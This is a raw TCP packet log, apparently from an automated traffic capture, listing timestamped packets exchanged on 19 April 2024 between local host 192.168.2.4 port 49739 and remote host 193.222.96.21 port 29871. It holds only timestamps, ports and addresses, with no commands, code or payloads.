                                                                                            Apr 19, 2024 19:12:12.524147034 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.524147034 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.524147034 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.524147034 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.726154089 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726187944 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726207018 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726226091 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726336956 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.726336956 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.726469994 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726502895 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726522923 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726542950 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726561069 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726583004 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726602077 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726619005 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726643085 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726661921 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726680040 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726691008 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.726700068 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726691008 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.726691008 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.726691008 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.726717949 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726737022 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726747036 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726757050 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726766109 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726767063 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.726768017 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.726775885 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726788044 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726824999 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726844072 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726861954 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726880074 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726897955 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726918936 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726937056 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726954937 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.726973057 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.727020025 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.727020025 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.727020025 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.727020025 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.727020979 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.727020979 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929366112 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929389954 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929408073 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929426908 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929445028 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929450035 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929467916 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929474115 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929485083 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929506063 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929516077 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929524899 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929543018 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929543018 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929560900 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929578066 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929596901 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929598093 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929620028 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929624081 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929641962 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929658890 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929675102 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929675102 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929692984 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929694891 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929711103 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929729939 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929744959 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929747105 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929764986 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929765940 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929783106 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929800034 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929816008 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929816961 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929836988 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929837942 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929857016 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929873943 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929889917 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929891109 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929908037 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929910898 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929925919 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929944038 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.929958105 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929980040 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.929996014 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930012941 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930030107 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930047989 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930049896 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930066109 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930083036 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930088043 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930099964 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930118084 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930124044 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930139065 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930154085 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930155993 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930172920 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930191040 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930208921 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930228949 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930228949 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930236101 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930253029 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930269957 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930286884 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930289984 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930305004 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930306911 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930325985 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930344105 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930358887 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930361986 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930382013 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930383921 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930398941 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930417061 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930433035 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930433989 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930449963 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930455923 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930469036 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930486917 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930488110 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930505991 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930526018 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:12.930545092 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:12.930563927 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.132117987 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.132153034 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.132174969 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.132194996 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.132308960 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.132308960 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133141994 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133171082 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133188963 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133209944 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133213997 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133229017 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133245945 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133248091 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133269072 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133285999 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133305073 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133305073 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133322001 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133326054 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133342028 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133358002 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133359909 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133377075 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133394957 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133410931 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133411884 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133430004 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133433104 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133449078 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133466005 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133466959 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133482933 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133501053 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133517981 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133518934 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133537054 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133539915 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133554935 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133572102 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133573055 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133590937 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133610010 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133627892 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133629084 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133647919 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133651972 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133666992 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133683920 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133702040 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133702993 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133727074 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133738041 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133754969 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133776903 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133795023 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133804083 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133812904 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133820057 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133831024 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133846045 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133848906 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133867979 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133883953 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133886099 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133904934 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133925915 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133944035 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133949041 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133961916 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133970976 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133980989 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133995056 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133997917 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134016037 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134032965 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134037018 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134049892 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134082079 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134098053 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134099960 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134118080 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134119987 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134135962 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134154081 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134174109 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134181976 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134192944 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134202003 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134211063 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134224892 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134231091 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134248972 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134265900 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134267092 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134284973 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134304047 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134320974 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134326935 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134342909 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134351015 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134361029 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134380102 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134382963 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134398937 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134417057 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134419918 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134434938 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134453058 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134459019 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134469986 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134488106 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134504080 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134505033 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134524107 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134525061 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134541988 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134561062 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134577036 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134577990 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134598017 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134599924 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134618044 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134634972 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134653091 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134658098 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134671926 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134675980 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134690046 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134708881 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134725094 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134727955 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134746075 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134747028 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134764910 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134784937 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134800911 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134803057 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134820938 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134824038 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134841919 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134859085 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134876013 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134877920 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134896040 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134897947 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134916067 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134933949 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134951115 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134951115 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134968996 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134974003 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134985924 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135003090 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135004044 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.135020971 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135039091 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135056019 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135056973 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.135073900 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135075092 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.135092020 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135109901 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135124922 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.135127068 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135145903 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.135145903 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135174990 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135193110 CEST2987149739193.222.96.21192.168.2.4
